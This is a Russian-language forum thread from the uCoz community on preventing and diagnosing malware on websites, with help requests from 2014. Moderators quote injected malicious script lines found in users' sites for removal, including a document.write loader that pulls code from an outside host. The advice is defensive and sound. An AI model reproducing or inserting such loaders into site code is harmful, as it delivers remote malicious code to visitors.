Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1156 | 18:29:02 14 Мар 2014
    НеТормози, avast! Premier 2014 не реагирует, при посещении указанного сайта
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1157 | 18:38:36 14 Мар 2014
    НеТормози, к тексту блокировки дайте ещё код блока статистика с установленными кодами
    и на каких страницах гавкает аваст? на всех страницах сайта или на определенных? и гавкает все время или периодически?
    у вас на внутренних страницах стоит довольно неприятный боди-клик. когда вы его установили?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    НеТормози
    Сообщений: 50
    Репутация: 1

    Сообщение # 1158 | 21:57:52 14 Мар 2014
    webanet, Как все было.... Позавчера с утра мой аваст начал ругаться на вирус, на любой странице. Ссылался на какой-то ресурс и как-будто на картинку. Попытался зайти на этот сайт, он заблокирован. Сейчас уже не вспомню какой ресурс, начало что-то типа mypage... Гавкает всегда, когда обновляется страница. Подумал, что в новости какая-то картинка вирусованная, отключил новостной блок, не помогло. Потом начал по одному отключать глобальные блоки, может где скрипт какой. В итоге при отключении первого контейнера, аваст перестал ругаться. Методом исключения выявил, что ругается на $ONLINE_COUNTER$ . Убрал его, написал вам. После вашей просьбы все показать, обратно вернул, НО, мой аваст больше не ругался. Зато продолжал ругаться у некоторых пользователей сайта. Завтра попрошу их отскринить сообщение. Насчет боди-клика, стоит больше года, проблем не было.

    Вот код. Если ставлю ремарку на $ONLINE_COUNTER$ , вирус больше не гав-гав.
    <!-- Статистика -->
    <?if($COUNTER$)?>
    <table style="width: 220">
    <tbody>
    <tr>
    <td style="border-width: 1px; border-style: solid; border-radius: 5px 5px 5px 5px;border-color: rgb(140, 140, 140);">
    <b><span style="font-family: Arial; font-size: 8pt; ">Статистика</span></b></div>
    <div align="center">$ONLINE_COUNTER$
    <div class="allusers" id="onl3">
    <a onclick="$('#uonline').slideToggle('slow');" href="javascript://">Список пользователей онлайн</a></div>
    <div id="uonline" style="display: none; padding-left: 6px;">$ONLINE_USERS_LIST$</div>
    </td></tr></tbody></table>
    <?endif?>
    Сообщение отредактировал НеТормози - Пятница, 14 Мар 2014, 22:00:14
    OLEG4832
    Сообщений: 7
    Репутация: 4

    Сообщение # 1159 | 03:22:34 15 Мар 2014
    Нна главной странице http://www.klblkoff.com/, под гостем вот такая рекламка:
    на всех страницах сайта под логином вот такая:
    Сообщение отредактировал OLEG4832 - Суббота, 15 Мар 2014, 03:23:30
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 1160 | 10:10:26 15 Мар 2014
    OLEG4832, убираем из кода установленных кнопок Войти и Зарегистрироваться вот такой скрипт:

    Код
    <!-- uzzscript src="http://china-air.ru/tsed.js" type="text/javascript"></script>-->
    OLEG4832
    Сообщений: 7
    Репутация: 4

    Сообщение # 1161 | 12:08:10 15 Мар 2014
    а на верхнем скрине рекламка. как её убрать? она только в мозиле вылазиет. антивирус на неё не реагирует.
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1162 | 12:38:17 15 Мар 2014
    OLEG4832, отключите временно все расширения для браузера, судя по всему проблема в одном из них.
    MegaTron7449
    Сообщений: 4
    Репутация: 0

    Сообщение # 1163 | 22:04:16 15 Мар 2014
    Яндекс объявил сайт зараженным, сегодня в 13:00 по МСК.
    Сайт: http://warplanes-world.ru

    В Вебмастере вот такое, не понимаю в чем проблема. В последнее время залил несколько архивов через ФТП менеджер, как файлы в load, несколько картинок.
    Затем появилась эта ссылка: 15.03.2014http://warplanes-world.ru/forum/22-29-1Mal/Iframe-AOСначала появилась эта ссылка: 15.03.2014http://warplanes-world.ru/forum/23-50-1Mal/Iframe-AO
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1164 | 22:07:42 15 Мар 2014
    MegaTron7449, откройте этот скрипт на редактирование

    Код
    <script type="text/javascript" src="/js/bspoiler.js"></script>


    и удалите зараженную часть
    Код

    /*264382*/
    document.write('<script type="text/javascript" src="http://fotaz.16mb.com/3fyCt8YG.php?id=625788"></script>');

    /*/264382*/


    после удаления. меняем все пароли и на фтп тоже. ставим максимально сложные
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    MegaTron7449
    Сообщений: 4
    Репутация: 0

    Сообщение # 1165 | 22:16:17 15 Мар 2014
    Спасибо.. только там во все файлы этот код засунули.

    Подскажите, как это могло произойти? Пароли и так сложные.. Как этого избежать? Антивирус и так у меня лицензионный стоит на компьютере.
    Как вы узнали, что в js скриптах вирус?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1166 | 22:42:29 15 Мар 2014
    MegaTron7449,
    Цитата
    Как этого избежать?
    не ходите по сайтам системы тем профилем, которым админите сайт. ставьте на фтп максимально сложный набор циферь и буков. пароль от фтп запоминать не надо. его можно назначать перед каждой сессией поэтому не стесняйтесь придумать самую страшную комбинацию. не держите проль от фтп в клиенте. сбрасывайте. после каждой сессии меняйте пароль. не устанавливайте все подряд расширения для браузера
    дальше читайте //forum.ucoz.ru/forum/45-35736-1

    Цитата
    Как вы узнали, что в js скриптах вирус?


    открыла содержимое скрипта и увидела
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    MegaTron7449
    Сообщений: 4
    Репутация: 0

    Сообщение # 1167 | 22:52:29 15 Мар 2014
    webanet, спасибо.

    не могли бы вы глянуть, где еще могли теоретически появиться вирусы на моем сайте, если не сложно. все js скрипты я очистил.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1168 | 22:54:07 15 Мар 2014
    MegaTron7449, пока только в файлах. после очистки пройдите в вебмастер яндекса и нажмите кнопку перепроверки (если она есть) напротив ссылки обнаружения
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    MegaTron7449
    Сообщений: 4
    Репутация: 0

    Сообщение # 1169 | 23:03:26 15 Мар 2014
    Антивирус: Emsisoft

    Значение: Gen:Adware.MPlug.1 (B)

    Добавлено (15 Мар 2014, 23:03:26)
    ---------------------------------------------
    Что за вирус? Это тот что в файлах моих был:?
    Проверил сайт тут: del
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1170 | 23:42:42 15 Мар 2014
    MegaTron7449,
    Цитата
    Проверил сайт тут:
    обратитесь в тех.поддержку данного сервиса. пусть они поясняют вам его работу и особенно тот пункт, что у подобных антивирусов должна обновится база
    может все же дождемся вердика от яндекса и не будет собой обтирать все онлайн проверки, большая часть из которых для серьезного анализа просто не годится?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск:
    Telegram
    Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!